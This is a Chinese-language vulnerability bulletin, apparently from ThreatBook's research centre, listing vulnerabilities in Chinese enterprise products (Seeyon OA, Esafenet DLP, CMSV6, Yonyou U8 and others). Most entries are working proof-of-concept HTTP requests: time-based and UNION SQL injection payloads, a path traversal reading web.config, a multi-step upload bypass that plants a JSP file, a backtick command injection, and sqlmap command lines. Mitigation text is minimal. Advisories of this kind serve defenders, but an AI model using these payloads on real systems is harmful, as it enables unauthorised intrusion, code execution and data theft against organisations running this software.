免责声明
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢! |
一、已验真的 0day 漏洞
1. 通天星主动安全监控云平台远程代码执行漏洞(XVE-2023-36633)
来源:X 漏洞奖励计划
影响版本:version <= V7.32.0.2
临时缓解措施:
使用防护类设备对相关资产进行防护,拦截请求中出现的恶意 SQL 语句。
如非必要,避免将资产暴露在互联网。
详情信息:
该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。
2. H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180)
来源:X 漏洞奖励计划
影响版本:version <= E1013P13
临时缓解措施:
使用防护类设备对相关资产进行防护,拦截请求中出现的恶意命令执行语句。
如非必要,避免将资产暴露在互联网。
详情信息:
该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。
来源:X 漏洞奖励计划
影响版本:version <= 20221210
临时缓解措施:
使用防护类设备对相关资产进行防护,拦截请求中出现的恶意 jsp 代码和../路径穿越字符。
如非必要,避免将资产暴露在互联网。
详情信息:
该漏洞仍处于 0day 状态,暂不公开提供。如有需要请联系微步支持。
二、已验真的 1day/Nday 漏洞
1、通天星 CMSV6 车载视频监控平台 disable 存在SQL 注入漏洞(XVE-2024-17935)
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2. 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入漏洞(XVE-2024-17936)
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
3. 亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入漏洞(XVE-2024-17938)
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
4. 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞(XVE-2024-17939)
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5. 启明星辰 天玥网络安全审计系统 SQL 注入漏洞(XVE-2023-5892)
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn"--data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch--force-ssl
6. 致远 OA fileUpload.do 前台文件上传绕过漏洞(XVE-2024-8166)
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUploadHTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30)
Content-Length: 754
--00content0boundary00
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions"
png
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Disposition: form-data; name="destDirectory"
--00content0boundary00
Content-Disposition: form-data; name="destFilename"
--00content0boundary00
Content-Disposition: form-data; name="maxSize"
--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"
false
--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf
<% out.println("hello");%>
--00content0boundary00--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Content-Length: 64
method=uploadMenuIcon&fileid=ID值&filename=qwe.jsp
GET /seeyon/main/menuIcon/qwe.jsp HTTP/1.1
Host:
7. F5 BIG-IP 远程代码执行漏洞(XVE-2023-29359)
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-46747.yaml
8. 用友 U8 cloud MonitorServlet 反序列化漏洞(XVE-2023-28865)
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
恶意序列化数据
9. 万户 OA SQL 注入漏洞(XVE-2023-26186)
python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs
10. 锐捷 RG-NBS2026G-P 交换机WEB 管理ping.htm未授权访问漏洞(XVE-2024-17942)
11. 福建科立讯通信 指挥调度管理平台ajax_users.php信息泄露漏洞(XVE-2024-17952)
12. 福建科立讯通信 指挥调度管理平台ajax_users.phpSQL注入漏洞(XVE-2024-15986)
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0info
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
13. 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞(XVE-2023-36635)
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */* Connection: keep-alive
三、未复现成功的漏洞
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞
同鑫科技 EHR 系统全系列 SQL 注入漏洞
金和 OA C6CreateGroup 接口注入漏洞
作者:微步研究响应中心(微步在线)